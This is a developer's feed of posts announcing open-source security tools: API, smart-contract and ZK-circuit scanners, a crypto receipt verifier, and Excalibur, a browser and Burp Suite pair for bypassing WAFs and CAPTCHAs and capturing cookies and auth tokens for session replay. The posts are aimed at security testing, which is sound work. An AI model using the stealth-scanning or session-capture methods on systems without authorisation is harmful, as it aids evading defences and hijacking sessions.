The latest articles on Forem by Teycir Ben Soltane (@teycir). https://forem.com/teycir https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3660322%2F12d22d00-5845-4390-bbfd-b8bbd7de160c.png https://forem.com/teycir en Teycir Ben Soltane Fri, 27 Mar 2026 20:52:23 +0000 https://forem.com/teycir/from-screenshots-to-verifiable-bitcoin-receipts-5gi3 https://forem.com/teycir/from-screenshots-to-verifiable-bitcoin-receipts-5gi3 <p>Screenshots are convenient, but they are not a strong proof of payment.</p> <p>I built <strong>GhostReceipt</strong> to test a simpler idea: create a receipt that can be independently verified, without asking people to trust an image or a chat message.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8x0xgmofqylxpcmlprga.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8x0xgmofqylxpcmlprga.png" alt=" " width="800" height="446"></a></p> <h2> What it does </h2> <p>GhostReceipt takes a transaction hash and creates a signed + verifiable receipt.</p> <p>The flow is:</p> <ol> <li>Fetch canonical transaction data from multiple providers.</li> <li>Confirm consistency (consensus checks).</li> <li>Sign the oracle payload with a tracked key.</li> <li>Generate a proof-backed receipt that can be verified from a link/QR.</li> </ol> <h2> Why this approach </h2> <p>The goal is practical trust minimization for normal workflows:</p> <ul> <li>payroll confirmation,</li> <li>contractor payment confirmation,</li> <li>merchant settlement evidence.</li> </ul> <p>Not “perfect trustlessness,” but stronger evidence than screenshots.</p> <h2> Design choices </h2> <ul> <li> <strong>Fail closed</strong> on missing critical config.</li> <li> <strong>No silent fallback</strong> on risky verification paths.</li> <li> <strong>Readable errors</strong> for non-technical users.</li> <li> <strong>Open-source implementation</strong> so the model can be reviewed.</li> </ul> <h2> Limits (important) </h2> <ul> <li>It does <strong>not</strong> prove legal identity or ownership intent.</li> <li>It still depends on oracle/provider availability.</li> <li>It is best treated as cryptographic evidence, not a legal judgment engine.</li> </ul> <h2> Current status </h2> <p>The project is live, tested across BTC/ETH/SOL paths, and still being hardened around reliability and operational safety.</p> <p>If you work on payment verification or trust tooling, I’d value feedback on failure modes and threat assumptions.</p> <p>Repo + docs: <a href="https://github.com/Teycir/Ghostreceipt" rel="noopener noreferrer">https://github.com/Teycir/Ghostreceipt</a> </p> zkproof cryptocurrency privacy bitcoin Teycir Ben Soltane Fri, 20 Mar 2026 00:04:21 +0000 https://forem.com/teycir/apihunter-async-api-security-scanner-in-rust-14p5 https://forem.com/teycir/apihunter-async-api-security-scanner-in-rust-14p5 <h1> 🎯 ApiHunter </h1> <p>Async API security scanner built in Rust for baseline testing and regression detection.<br> <a href="https://github.com/Teycir/ApiHunter" rel="noopener noreferrer">https://github.com/Teycir/ApiHunter</a></p> <h2> What It Does </h2> <p>Scans APIs for common vulnerabilities:</p> <ul> <li> <strong>CORS/CSP</strong> misconfigurations with bypass detection</li> <li> <strong>GraphQL</strong> introspection + sensitive schema fields</li> <li> <strong>JWT</strong> vulnerabilities (alg=none, weak secrets, expiry)</li> <li> <strong>IDOR/BOLA</strong> with 3-tier testing (unauth/range/cross-user)</li> <li> <strong>Secret exposure</strong> (AWS keys, tokens, credentials)</li> <li> <strong>168 CVE templates</strong> with Nuclei YAML import support</li> <li> <strong>Active checks</strong> (mass assignment, OAuth/OIDC, rate limits, WebSocket)</li> </ul> <h2> Why ApiHunter? </h2> <p>✅ <strong>False positive filtering</strong> - SPA detection, body validation, context-aware secrets<br><br> ✅ <strong>CI/CD native</strong> - Baseline diffing, SARIF output, exit code control<br><br> ✅ <strong>Production-safe</strong> - Adaptive concurrency (AIMD), rate limiting, politeness controls<br><br> ✅ <strong>Stealth</strong> - UA rotation, jitter, per-host delays, no scanner fingerprints<br><br> ✅ <strong>Dual extensibility</strong> - TOML templates (no code) + Rust modules (full control)</p> <h2> Quick Start </h2> <h1> Install </h1> <p><code>git clone https://github.com/Teycir/ApiHunter<br> cd ApiHunter<br> cargo build --release</code></p> <h1> Scan </h1> <p><code>./target/release/apihunter \<br> --urls targets.txt \<br> --format ndjson \<br> --min-severity medium</code></p> <h1> With active checks </h1> <p><code>./target/release/apihunter \<br> --urls targets.txt \<br> --active-checks \<br> --auth-bearer "your-token"</code></p> rust security api opensource Teycir Ben Soltane Thu, 05 Mar 2026 20:48:05 +0000 https://forem.com/teycir/a-rust-powered-security-scanner-for-ethereum-smart-contracts-4al3 https://forem.com/teycir/a-rust-powered-security-scanner-for-ethereum-smart-contracts-4al3 <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwudhxk0c2m90ilf8o8px.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwudhxk0c2m90ilf8o8px.png" alt="Smart contract security scanner"></a></p> <h2> Why I Built This </h2> <p>Smart contract vulnerabilities cost billions in losses. Tools like Slither and Mythril are excellent for static analysis, but they're fixed in their detection capabilities. I wanted something different: a tool that gets stronger over time as the community adds patterns.</p> <p>That's <strong>SCPF</strong> (Smart Contract Pattern Finder).</p> <p><strong>The key difference:</strong> SCPF is extensible by design. Every new exploit, every discovered vulnerability pattern can be added as a YAML template. The more templates you have, the more powerful the scanner becomes.</p> <h2> What It Does </h2> <p>SCPF scans Ethereum smart contracts for security vulnerabilities using customizable YAML templates.</p> <p><strong>Core features:</strong></p> <ul> <li>✅ Pattern-based detection (reentrancy, delegatecall, unchecked calls)</li> <li>✅ Local <code>.sol</code> file scanning</li> <li>✅ Git diff scanning (only changed files)</li> <li>✅ GitHub Actions integration with SARIF output</li> <li>✅ Cascade API key system (up to 6 Etherscan keys with automatic failover)</li> </ul> <h2> How It Works </h2> <h3> 1️⃣ Define Patterns in YAML </h3> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">id</span><span class="pi">:</span> <span class="s">reentrancy-basic</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Basic Reentrancy Pattern</span> <span class="na">severity</span><span class="pi">:</span> <span class="s">high</span> <span class="na">patterns</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">external-call-with-value</span> <span class="na">pattern</span><span class="pi">:</span> <span class="s1">'</span><span class="s">\.call\{value:'</span> <span class="na">message</span><span class="pi">:</span> <span class="s">External call with value transfer detected</span> </code></pre> </div> <h3> 2️⃣ Scan Contracts </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Scan deployed contract</span> scpf scan 0x1234567890abcdef <span class="nt">--chains</span> ethereum <span class="c"># Scan local project</span> scpf scan <span class="c"># Scan only changed files</span> scpf scan <span class="nt">--diff</span> main..HEAD </code></pre> </div> <h3> 3️⃣ Get Results </h3> <p>Output formats: console, JSON, or SARIF (for CI/CD).</p> <h2> Real-World Use Cases </h2> <p>🔒 <strong>Security Auditors:</strong> Automate initial vulnerability detection before manual review.</p> <p>⚡ <strong>DeFi Developers:</strong> Pre-deployment checks in CI/CD pipelines.</p> <p>🎯 <strong>Bug Bounty Hunters:</strong> Batch scan multiple contracts quickly.</p> <p>📚 <strong>Educators:</strong> Teach common vulnerability patterns with real examples.</p> <h2> Technical Highlights </h2> <h3> 🦀 Built with Rust </h3> <p>Fast, memory-safe, and concurrent. Handles large contracts efficiently.</p> <h3> 🔑 Cascade API Key System </h3> <p>Configure up to 6 Etherscan API keys. If one hits rate limits, SCPF automatically rotates to the next. Zero downtime.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">export </span><span class="nv">ETHERSCAN_API_KEY</span><span class="o">=</span><span class="s2">"key-1"</span> <span class="nb">export </span><span class="nv">ETHERSCAN_API_KEY_2</span><span class="o">=</span><span class="s2">"key-2"</span> <span class="c"># ... up to key-6</span> </code></pre> </div> <p><strong>Result:</strong> 30 calls/sec instead of 5 (with 6 free Etherscan accounts).</p> <h3> 🤖 GitHub Actions Integration </h3> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">teycir/smartcontractpatternfinder@v1</span> <span class="na">with</span><span class="pi">:</span> <span class="na">severity</span><span class="pi">:</span> <span class="s">high</span> <span class="na">output-format</span><span class="pi">:</span> <span class="s">sarif</span> </code></pre> </div> <p>Findings appear directly in GitHub's Security tab.</p> <h3> 🏗️ Modular Architecture </h3> <ul> <li> <code>scpf-types</code>: Core data structures</li> <li> <code>scpf-core</code>: Scanning engine with semantic analysis</li> <li> <code>scpf-cli</code>: Command-line interface</li> <li> <code>scpf-server</code>: Optional web dashboard</li> </ul> <h2> Current Limitations </h2> <p>⚠️ <strong>Ethereum only:</strong> Currently supports Ethereum mainnet via Etherscan API. Multi-chain support (BSC, Polygon, Arbitrum) is planned but not yet implemented.</p> <p>⚠️ <strong>Pattern-based detection:</strong> SCPF finds patterns you define. It's not a symbolic execution engine like Mythril. Best used as a first-pass filter before deeper analysis.</p> <p>⚠️ <strong>False positives:</strong> Context-aware filtering reduces obvious false positives, but manual review is still needed.</p> <h2> Getting Started </h2> <h3> Installation </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>git clone https://github.com/Teycir/smartcontractpatternfinder.git <span class="nb">cd </span>smartcontractpatternfinder cargo build <span class="nt">--release</span> </code></pre> </div> <h3> Quick Scan </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>scpf init scpf scan 0xYourContractAddress <span class="nt">--chains</span> ethereum </code></pre> </div> <h3> CI/CD Integration </h3> <p>Add to <code>.github/workflows/security.yml</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">name</span><span class="pi">:</span> <span class="s">Security Scan</span> <span class="na">on</span><span class="pi">:</span> <span class="pi">[</span><span class="nv">push</span><span class="pi">,</span> <span class="nv">pull_request</span><span class="pi">]</span> <span class="na">jobs</span><span class="pi">:</span> <span class="na">scpf</span><span class="pi">:</span> <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span> <span class="na">permissions</span><span class="pi">:</span> <span class="na">security-events</span><span class="pi">:</span> <span class="s">write</span> <span class="na">steps</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/checkout@v4</span> <span class="pi">-</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">teycir/smartcontractpatternfinder@v1</span> </code></pre> </div> <h2> Roadmap </h2> <ul> <li>🌐 <strong>Multi-chain support:</strong> BSC, Polygon, Arbitrum, Optimism, Base</li> <li>📦 <strong>Template marketplace:</strong> Community-contributed patterns</li> <li>🤖 <strong>AI-assisted pattern generation:</strong> Suggest patterns from exploit reports</li> <li>🧠 <strong>Enhanced semantic analysis:</strong> Reduce false positives further</li> </ul> <h2> Open Source &amp; MIT Licensed </h2> <p>SCPF is fully open source under MIT license. Contributions welcome.</p> <p> </p> <div class="ltag-github-readme-tag"> <div class="readme-overview"> <h2> <img src="https://assets.dev.to/assets/github-logo-5a155e1f9a670af7944dd5e12375bc76ed542ea80224905ecaf878b9157cdefc.svg" alt="GitHub logo"> <a href="https://github.com/Teycir" rel="noopener noreferrer"> Teycir </a> / <a href="https://github.com/Teycir/smartcontractpatternfinder" rel="noopener noreferrer"> smartcontractpatternfinder </a> </h2> <h3> High-performance Rust tool for detecting security vulnerabilities in smart contracts. Ethereum mainnet support with YAML-based pattern templates, CI/CD integration, and SARIF output for GitHub Security tab. </h3> </div> <div class="ltag-github-body"> <div id="readme" class="md"> <div> <div class="markdown-heading"> <h2 class="heading-element">Support Development</h2> </div> <p>If this project helps your work, support ongoing maintenance and new features.</p> <p><strong>ETH Donation Wallet</strong><br> <code>0x11282eE5726B3370c8B480e321b3B2aA13686582</code></p> <a href="https://etherscan.io/address/0x11282eE5726B3370c8B480e321b3B2aA13686582" rel="nofollow noopener noreferrer"> <img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2FTeycir%2Fsmartcontractpatternfinder%2Fpubliceth.svg" alt="Ethereum donation QR code" width="220"> </a> <p><em>Scan the QR code or copy the wallet address above.</em></p> </div> <div class="markdown-heading"> <h1 class="heading-element">Smart Contract Pattern Finder (SCPF)</h1> </div> <div> <a rel="noopener noreferrer" href="https://github.com/Teycir/smartcontractpatternfinder/assets/logo.png"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2FTeycir%2Fsmartcontractpatternfinder%2Fassets%2Flogo.png" width="150" alt="SCPF Logo"></a> <br> <a rel="noopener noreferrer" href="https://github.com/Teycir/smartcontractpatternfinder/assets/scpf_banner.gif"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2FTeycir%2Fsmartcontractpatternfinder%2Fassets%2Fscpf_banner.gif" width="60%" alt="Smart Contract Pattern Finder Banner"></a> </div> <p>🔍 High-performance tool for detecting security vulnerabilities and patterns in Ethereum smart contracts.</p> <p><strong>How it works:</strong> Define patterns in YAML templates → SCPF scans smart contracts → Finds matching patterns → Reports vulnerabilities</p> <p><a href="https://www.rust-lang.org/" rel="nofollow noopener noreferrer"><img src="https://camo.githubusercontent.com/85adb97a437bb60f156b2deb25d175b0478305a3a33056d3ef9c503df6145582/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f727573742d2532333030303030302e7376673f7374796c653d666f722d7468652d6261646765266c6f676f3d72757374266c6f676f436f6c6f723d7768697465" alt="Rust"></a> <a href="https://github.com/Teycir/smartcontractpatternfinder/LICENSE" rel="noopener noreferrer"><img src="https://camo.githubusercontent.com/7a1226d14a365d288bfe51ece915ee0c7e754a16faa51ff06436504de29b33b4/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f4c6963656e73652d4d49542d79656c6c6f772e7376673f7374796c653d666f722d7468652d6261646765" alt="License: MIT"></a> <a href="https://crates.io/crates/scpf-cli" rel="nofollow noopener noreferrer"><img src="https://camo.githubusercontent.com/4f189039875670908c56664d8e21cf9198ce8dec7a44bb1cc95d4f1ca3c53338/68747470733a2f2f696d672e736869656c64732e696f2f6372617465732f762f736370662d636c692e7376673f7374796c653d666f722d7468652d6261646765" alt="Crates.io"></a> <a href="https://docs.rs/scpf-core" rel="nofollow noopener noreferrer"><img src="https://camo.githubusercontent.com/9797f0005baa09b50649b8e11c30d94ab5bc2a745e4d777977d372b68c261e59/68747470733a2f2f696d672e736869656c64732e696f2f62616467652f646f63732e72732d736370662d2d636f72652d626c75653f7374796c653d666f722d7468652d6261646765266c6f676f3d646f63732e7273" alt="Docs.rs"></a> <a href="https://github.com/Teycir/smartcontractpatternfinder/actions/workflows/ci.yml" rel="noopener noreferrer"><img src="https://camo.githubusercontent.com/6b8cc3a2d5d1e6916775e2b01e06fcde0770320c8cb79c68dc5ed1ec181f6e98/68747470733a2f2f696d672e736869656c64732e696f2f6769746875622f616374696f6e732f776f726b666c6f772f7374617475732f5465796369722f736d617274636f6e74726163747061747465726e66696e6465722f63692e796d6c3f7374796c653d666f722d7468652d6261646765266c6f676f3d676974687562" alt="GitHub Workflow Status"></a></p> <p><strong>Tags:</strong> <code>rust</code> <code>smart-contracts</code> <code>security</code> <code>scanner</code> <code>ethereum</code> <code>blockchain</code> <code>vulnerability-detection</code> <code>pattern-matching</code> <code>defi</code> <code>web3</code> <code>solidity</code> <code>static-analysis</code> <code>open-source</code> <code>mit</code></p> <div class="markdown-heading"> <h2 class="heading-element">📑 Table of Contents</h2> </div> <ul> <li> <a href="https://github.com/Teycir/smartcontractpatternfinder#smart-contract-pattern-finder-scpf" rel="noopener noreferrer">Smart Contract Pattern Finder (SCPF)</a> <ul> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#-table-of-contents" rel="noopener noreferrer">📑 Table of Contents</a></li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#-features" rel="noopener noreferrer">✨ Features</a></li> <li> <a href="https://github.com/Teycir/smartcontractpatternfinder#-use-cases" rel="noopener noreferrer">💡 Use Cases</a> <ul> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#security-auditing" rel="noopener noreferrer">Security Auditing</a></li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#defi-research" rel="noopener noreferrer">DeFi Research</a></li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#bug-bounty-hunting" rel="noopener noreferrer">Bug Bounty Hunting</a></li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#development--cicd" rel="noopener noreferrer">Development &amp; CI/CD</a></li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#education--training" rel="noopener noreferrer">Education &amp; Training</a></li> </ul> </li> <li> <a href="https://github.com/Teycir/smartcontractpatternfinder#-quick-start" rel="noopener noreferrer">🚀 Quick Start</a> <ul> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#how-it-works" rel="noopener noreferrer">How It Works</a></li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#installation" rel="noopener noreferrer">Installation</a></li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#initialize-project" rel="noopener noreferrer">Initialize Project</a></li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#scan-a-contract" rel="noopener noreferrer">Scan a Contract</a></li> </ul> </li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#-template-example" rel="noopener noreferrer">📋 Template Example</a></li> <li> <a href="https://github.com/Teycir/smartcontractpatternfinder#%EF%B8%8F-architecture" rel="noopener noreferrer">🏗️ Architecture</a> <ul> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#module-overview" rel="noopener noreferrer">Module Overview</a></li> </ul> </li> <li> <a href="https://github.com/Teycir/smartcontractpatternfinder#%EF%B8%8F-cli-commands" rel="noopener noreferrer">🛠️ CLI Commands</a> <ul> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#scpf-scan" rel="noopener noreferrer"><code>scpf scan</code></a></li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#scpf-init" rel="noopener noreferrer"><code>scpf init</code></a></li> </ul> </li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#-supported-chains" rel="noopener noreferrer">🎯 Supported Chains</a></li> <li> <a href="https://github.com/Teycir/smartcontractpatternfinder#-configuration" rel="noopener noreferrer">🔧 Configuration</a> <ul> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#getting-api-keys" rel="noopener noreferrer">Getting API Keys</a></li> </ul> </li> <li><a href="https://github.com/Teycir/smartcontractpatternfinder#-output-formats" rel="noopener noreferrer">📊 Output Formats</a></li> <li> <a href="https://github.com/Teycir/smartcontractpatternfinder#-development" rel="noopener noreferrer">🧪</a>…</li> </ul> </li> </ul> </div> </div> <div class="gh-btn-container"><a class="gh-btn" href="https://github.com/Teycir/smartcontractpatternfinder" rel="noopener noreferrer">View on GitHub</a></div> </div> <p><strong>Documentation:</strong> <a href="https://github.com/Teycir/smartcontractpatternfinder/tree/main/docs" rel="noopener noreferrer">GitHub Docs</a></p> <h2> Try It Out </h2> <p>If you're working with Ethereum smart contracts, give SCPF a try. It won't replace manual audits, but it can catch common issues early.</p> <p>Feedback and contributions are welcome. Let's make smart contract security more accessible. 🚀</p> <p><strong>Connect with me:</strong></p> <ul> <li>🌐 <a href="https://teycirbensoltane.tn" rel="noopener noreferrer">Website</a> </li> <li>💻 <a href="https://github.com/Teycir" rel="noopener noreferrer">GitHub</a> </li> </ul> rust ethereum security blockchain Teycir Ben Soltane Fri, 27 Feb 2026 15:53:23 +0000 https://forem.com/teycir/zkpatternmatcher-a-practical-security-scanner-for-zk-circuits-1p95 https://forem.com/teycir/zkpatternmatcher-a-practical-security-scanner-for-zk-circuits-1p95 <p><a href="https://dev.tourl">GitHub: https://github.com/Teycir/ZkPatternMatcher<br> </a></p> <h2> The Problem </h2> <p>Zero-Knowledge proof circuits (like Circom) can have subtle vulnerabilities that break cryptographic soundness. A single underconstrained signal can allow proof forgery.</p> <h2> The Solution: Pattern Matching </h2> <p>I built ZkPatternMatcher - a Rust-based scanner that detects vulnerabilities using YAML-defined patterns.</p> <h2> Quick Example </h2> <p>Detect underconstrained assignments:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>patterns: - id: underconstrained_assignment kind: regex pattern: '&lt;--' message: 'Unconstrained assignment detected' severity: critical </code></pre> </div> <p>Run the scanner:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>zkpm patterns/vulnerabilities.yaml circuit.circom </code></pre> </div> <p>Output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>🔴 [Critical] Unconstrained assignment operator (&lt;--) detected Location: line 15, column 7 </code></pre> </div> <h2> Key Features </h2> <p>✅ Validated - Tested against 16 real-world vulnerable circuits<br> ✅ Easy patterns - 3-step YAML contribution process<br> ✅ CI/CD ready - JSON output for automation<br> ✅ Library + CLI - Use standalone or integrate into Rust projects</p> <h2> Usage as Library </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>use zk_pattern_matcher::{load_pattern_library, PatternMatcher}; let library = load_pattern_library("patterns/vulnerabilities.yaml")?; let matcher = PatternMatcher::new(library)?; let matches = matcher.scan_file("circuit.circom")?; </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>for m in matches { println!("{:?}: {}", m.severity, m.message); } </code></pre> </div> <h2> CI/CD Integration </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>.github/workflows/security.yml - run: cargo install zkpm --version 0.1.0 - run: zkpm --format json patterns/production.yaml circuits/ </code></pre> </div> <h2> Contributing Patterns </h2> <p>(Super Easy!)<br> Copy template:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>cp patterns/TEMPLATE.yaml patterns/your_pattern.yaml </code></pre> </div> <p>Fill in vulnerability details</p> <p>Test: zkpm validate patterns/your_pattern.yaml</p> <h2> Pattern sources: </h2> <p>zkBugs, audit reports, CVE databases.</p> <h2> Tech Stack </h2> <p>Rust 1.80+ (uses LazyLock for semantic analysis)<br> regex/fancyregex engines<br> serde for YAML parsing<br> clap for CLI</p> <h2> Current Status </h2> <p>✅ <strong>5 baseline patterns</strong> (3 vulnerability detectors + 2 developer markers)<br><br> ✅ 16 vulnerable fixtures + 10 safe controls validated<br><br> ✅ 0 high/critical false positives on safe controls </p> zkp cryptography cybersecurity opensource Teycir Ben Soltane Wed, 04 Feb 2026 17:42:08 +0000 https://forem.com/teycir/excalibur-a-manual-waf-bypass-cookie-extractor-tool-for-security-researchers-2235 https://forem.com/teycir/excalibur-a-manual-waf-bypass-cookie-extractor-tool-for-security-researchers-2235 <p>Modern web applications employ increasingly sophisticated security measures including Web Application Firewalls (WAFs), CAPTCHAs, and bot detection systems. These protections often block automated security scanners and make it difficult to test APIs behind authentication. </p> <p>Introducing <strong>Excalibur</strong> — a dual-component security testing tool designed to bypass WAFs, CAPTCHAs, and other anti-bot protections through manual browser interaction.</p> <h2> What is Excalibur? </h2> <p>Excalibur consists of two integrated components:</p> <ol> <li><p><strong>Chrome Extension</strong> — Intercepts and records HTTP traffic while you manually solve CAPTCHAs, complete authentication flows, and navigate through protected applications.</p></li> <li><p><strong>Burp Suite Extension</strong> — Imports recorded HTTP Archive (HAR) files and extracted cookies into Burp Suite, enabling automated security testing on previously protected endpoints.</p></li> </ol> <p>The bridge between manual browser interaction and automated security testing? That's exactly what Excalibur provides.</p> <h2> The Problem Excalibur Solves </h2> <p>As security researchers and bug hunters, we've all faced these challenges:</p> <ul> <li> <strong>WAF blocks</strong> preventing automated scanning</li> <li> <strong>CAPTCHAs</strong> requiring human interaction</li> <li> <strong>Authentication walls</strong> blocking API exploration</li> <li> <strong>Session management</strong> nightmare when working across tools</li> </ul> <p>Traditional approaches involve:</p> <ul> <li>Manually copying cookies (error-prone and tedious)</li> <li>Disabling protections (not always possible or ethical)</li> <li>Writing custom browser automation scripts (time-consuming)</li> <li>Getting blocked by sophisticated bot detection</li> </ul> <p>Excalibur offers a clean, efficient solution that maintains legitimate sessions through manual interaction while capturing everything needed for automated analysis.</p> <h2> How Excalibur Works </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │ Manual │ → │ Excalibur │ → │ Burp Suite │ │ Browser │ │ Record &amp; │ │ Security │ │ Interaction │ │ Export │ │ Testing │ └──────────────┘ └──────────────┘ └──────────────┘ </code></pre> </div> <h3> 1. Manual Browser Interaction </h3> <p>You browse the target application manually in Chrome, solving any CAPTCHAs or authentication challenges as a normal user would. This establishes a legitimate session that bypasses WAF protections.</p> <h3> 2. Traffic Recording </h3> <p>Excalibur records all HTTP traffic during your session using Chrome's webRequest API. It captures:</p> <ul> <li>Complete request/response data</li> <li>All headers (including authentication tokens)</li> <li>Cookies with domain and path information</li> <li>Timing data for analysis</li> </ul> <h3> 3. Export and Import </h3> <p>Export the recorded session as HAR and JSON files, then load them into Burp Suite for detailed security analysis, automated scanning, and manual testing.</p> <h2> Key Features </h2> <h3> Chrome Extension Features </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Feature</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>▶️ <strong>Start/Stop Recording</strong> </td> <td>Toggle session recording with visual feedback</td> </tr> <tr> <td>📊 <strong>Real-time Counters</strong> </td> <td>Live display of captured requests and cookies</td> </tr> <tr> <td>📦 <strong>HAR Export</strong> </td> <td>Export recorded traffic in standard HTTP Archive format</td> </tr> <tr> <td>🍪 <strong>Cookie Extraction</strong> </td> <td>Automatic extraction of all cookies to JSON</td> </tr> <tr> <td>🎨 <strong>Modern UI</strong> </td> <td>Clean, gradient-based user interface</td> </tr> <tr> <td>🔄 <strong>Background Recording</strong> </td> <td>Continuous recording via Chrome service worker API</td> </tr> <tr> <td>🔍 <strong>DevTools Panel</strong> </td> <td>Integrated panel for advanced monitoring</td> </tr> </tbody> </table></div> <h3> Burp Suite Extension Features </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Feature</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>📥 <strong>HAR File Loading</strong> </td> <td>Import HAR files directly into Burp Site Map</td> </tr> <tr> <td>🍪 <strong>Cookie Import</strong> </td> <td>Import JSON cookies into Burp Cookie Jar</td> </tr> <tr> <td>📊 <strong>Request History</strong> </td> <td>Sortable table view of all imported requests</td> </tr> <tr> <td>📈 <strong>Statistics Panel</strong> </td> <td>Summary of requests, hosts visited, and timestamps</td> </tr> <tr> <td>📝 <strong>Activity Log</strong> </td> <td>Detailed timestamped log of all operations</td> </tr> <tr> <td>🔄 <strong>Session Replay</strong> </td> <td>Replay imported requests with captured cookies</td> </tr> </tbody> </table></div> <h2> Quick Start Guide </h2> <h3> Installing the Chrome Extension </h3> <ol> <li>Open Chrome → <code>chrome://extensions/</code> </li> <li>Enable <strong>Developer mode</strong> (top right toggle)</li> <li>Click <strong>Load unpacked</strong> </li> <li>Select the <code>chrome extension/</code> folder from Excalibur</li> <li>Pin the Excalibur icon to your toolbar</li> </ol> <h3> Installing the Burp Suite Extension </h3> <ol> <li>Open Burp Suite (Professional or Community)</li> <li>Go to <strong>Extensions</strong> → <strong>Add</strong> → <strong>Python</strong> </li> <li>Select <code>burp-extension/excalibur_loader.py</code> </li> <li>Verify extension loads successfully</li> <li>Navigate to the new <strong>Excalibur</strong> tab</li> </ol> <h3> Prerequisites </h3> <ul> <li> <strong>Chrome/Chromium</strong> browser</li> <li> <strong>Burp Suite</strong> (Professional or Community Edition)</li> <li> <strong>Jython</strong> standalone JAR (for Burp Python support)</li> </ul> <h2> Usage Workflow: Simple 3-Step Process </h2> <h3> Step 1: Record in Chrome </h3> <ol> <li>Click the Excalibur icon in Chrome</li> <li>Click <strong>▶️ Start Recording</strong> </li> <li>Navigate to your target site</li> <li>Solve CAPTCHAs, complete authentication flows, browse as normal</li> <li>Click <strong>⏹️ Stop Recording</strong> </li> </ol> <p>The extension displays real-time counters showing how many requests and cookies have been captured.</p> <h3> Step 2: Export HAR Files </h3> <ol> <li>Click <strong>📦 Export HAR</strong> </li> <li>Two files download automatically: <ul> <li> <code>excalibur-session-YYYYMMDD-HHMMSS.har</code> — Complete HTTP traffic</li> <li> <code>excalibur-session-YYYYMMDD-HHMMSS-cookies.json</code> — All cookies</li> </ul> </li> </ol> <h3> Step 3: Load in Burp Suite </h3> <ol> <li>Open Burp Suite → <strong>Excalibur</strong> tab</li> <li>Click <strong>Load HAR File</strong> → Select your exported HAR</li> <li>Click <strong>Load Cookies JSON</strong> → Select your exported cookies</li> <li>View requests in <strong>Target → Site Map</strong> and <strong>History</strong> tabs</li> </ol> <p>Now you have complete access to the protected application through Burp Suite!</p> <h2> Understanding the Output Files </h2> <h3> HAR File (<code>excalibur-session-YYYYMMDD-HHMMSS.har</code>) </h3> <p>The HTTP Archive format contains:</p> <ul> <li>All recorded requests and responses</li> <li>Request/response headers including authentication tokens</li> <li>Request and response bodies 